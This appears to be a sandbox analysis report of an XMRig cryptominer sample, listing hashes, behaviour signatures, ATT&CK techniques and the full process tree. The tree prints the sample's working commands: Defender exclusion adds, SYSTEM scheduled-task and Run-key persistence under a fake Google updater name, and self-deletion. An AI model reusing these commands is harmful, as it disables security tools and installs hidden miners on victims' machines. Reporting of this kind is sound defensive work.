Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    371s
  • max time network
    1806s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24-01-2024 17:15

General

  • Target

    grhsghsGHswgh/Be5sCbvuma2nkHDa.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1292
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1320
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2680
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2120
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:2652
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2656
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:2572
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1936
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2564
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:592
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:932
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2580
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2632
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {F109AA6C-5D8F-4B42-BFE6-B44D4147A2A6} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:320
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2792
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1364
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          1⤵
          • Drops file in Program Files directory
          PID:1388

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          2.0MB

          MD5

          a16a669a09bf158058b83e04e69fe38e

          SHA1

          f6c94763850d9e590d86057139e8895a7aacdeea

          SHA256

          cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

          SHA512

          658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          1.3MB

          MD5

          4c131b6aad16f0815451a8672b401882

          SHA1

          df390263cf04ef03411b722c4238f885466403a7

          SHA256

          3ed51cd1d194991043a7c6eca55eb67d421a47873b88a3e94537ad29d1897ed7

          SHA512

          3dcad5a5dd9d51bb23e791b1b40d2246d7d9bd68560ce203c57c4fee830e86dca624349030b7b38f6f3f91e48019d245f6afc12ea474d089b364351b4011efe0

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          adb9377fbec11f55b1f38f67cf8dfec3

          SHA1

          6fb0a5a7e77c7d8e58c270867b426e4ec76d7cd1

          SHA256

          da70a08c6d24ff5185b282b70a233325860aaa56192debbb0d6739c5f4eb3b9c

          SHA512

          db3d0505aea1e5782d2f895b0fc4d62b8a090aea7c34810f867129427aeb3252346c6d2e636a0ea755127810181d34e1d8512450cbcc3c92f1be6dd030502e2b

        • memory/1320-0-0x000000013F500000-0x000000013F711000-memory.dmp
          Filesize

          2.1MB

        • memory/1320-28-0x000000013F500000-0x000000013F711000-memory.dmp
          Filesize

          2.1MB

        • memory/1936-47-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp
          Filesize

          9.6MB

        • memory/1936-46-0x0000000001160000-0x00000000011E0000-memory.dmp
          Filesize

          512KB

        • memory/1936-44-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp
          Filesize

          9.6MB

        • memory/1936-45-0x0000000001160000-0x00000000011E0000-memory.dmp
          Filesize

          512KB

        • memory/1936-48-0x0000000001160000-0x00000000011E0000-memory.dmp
          Filesize

          512KB

        • memory/1936-49-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2564-50-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/2564-51-0x0000000000FE0000-0x0000000001060000-memory.dmp
          Filesize

          512KB

        • memory/2564-52-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/2564-54-0x0000000000FE0000-0x0000000001060000-memory.dmp
          Filesize

          512KB

        • memory/2564-55-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/2564-53-0x0000000000FE0000-0x0000000001060000-memory.dmp
          Filesize

          512KB

        • memory/2580-67-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2580-71-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2632-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-151-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-149-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-147-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-140-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-138-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-131-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-64-0x00000000002C0000-0x00000000002E0000-memory.dmp
          Filesize

          128KB

        • memory/2632-63-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-65-0x0000000000890000-0x00000000008B0000-memory.dmp
          Filesize

          128KB

        • memory/2632-66-0x0000000000C50000-0x0000000000C70000-memory.dmp
          Filesize

          128KB

        • memory/2632-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-68-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-70-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2632-74-0x0000000000890000-0x00000000008B0000-memory.dmp
          Filesize

          128KB

        • memory/2632-75-0x0000000000C50000-0x0000000000C70000-memory.dmp
          Filesize

          128KB

        • memory/2632-76-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2656-35-0x00000000023E0000-0x0000000002460000-memory.dmp
          Filesize

          512KB

        • memory/2656-36-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/2656-37-0x00000000023E0000-0x0000000002460000-memory.dmp
          Filesize

          512KB

        • memory/2656-38-0x00000000023E0000-0x0000000002460000-memory.dmp
          Filesize

          512KB

        • memory/2656-39-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/2656-34-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/2744-26-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2744-21-0x0000000002770000-0x00000000027F0000-memory.dmp
          Filesize

          512KB

        • memory/2744-25-0x0000000002770000-0x00000000027F0000-memory.dmp
          Filesize

          512KB

        • memory/2744-24-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2744-18-0x000000001B270000-0x000000001B552000-memory.dmp
          Filesize

          2.9MB

        • memory/2744-20-0x000007FEF51D0000-0x000007FEF5B6D000-memory.dmp
          Filesize

          9.6MB

        • memory/2744-19-0x0000000002360000-0x0000000002368000-memory.dmp
          Filesize

          32KB

        • memory/2744-22-0x0000000002770000-0x00000000027F0000-memory.dmp
          Filesize

          512KB

        • memory/2744-23-0x0000000002770000-0x00000000027F0000-memory.dmp
          Filesize

          512KB

        • memory/2792-43-0x000000013F9A0000-0x000000013FBB1000-memory.dmp
          Filesize

          2.1MB

        • memory/2792-62-0x000000013F9A0000-0x000000013FBB1000-memory.dmp
          Filesize

          2.1MB

        • memory/3012-11-0x00000000027D0000-0x0000000002850000-memory.dmp
          Filesize

          512KB

        • memory/3012-12-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/3012-10-0x00000000027D0000-0x0000000002850000-memory.dmp
          Filesize

          512KB

        • memory/3012-6-0x0000000001D30000-0x0000000001D38000-memory.dmp
          Filesize

          32KB

        • memory/3012-5-0x000000001B2B0000-0x000000001B592000-memory.dmp
          Filesize

          2.9MB

        • memory/3012-9-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB

        • memory/3012-8-0x00000000027D0000-0x0000000002850000-memory.dmp
          Filesize

          512KB

        • memory/3012-7-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp
          Filesize

          9.6MB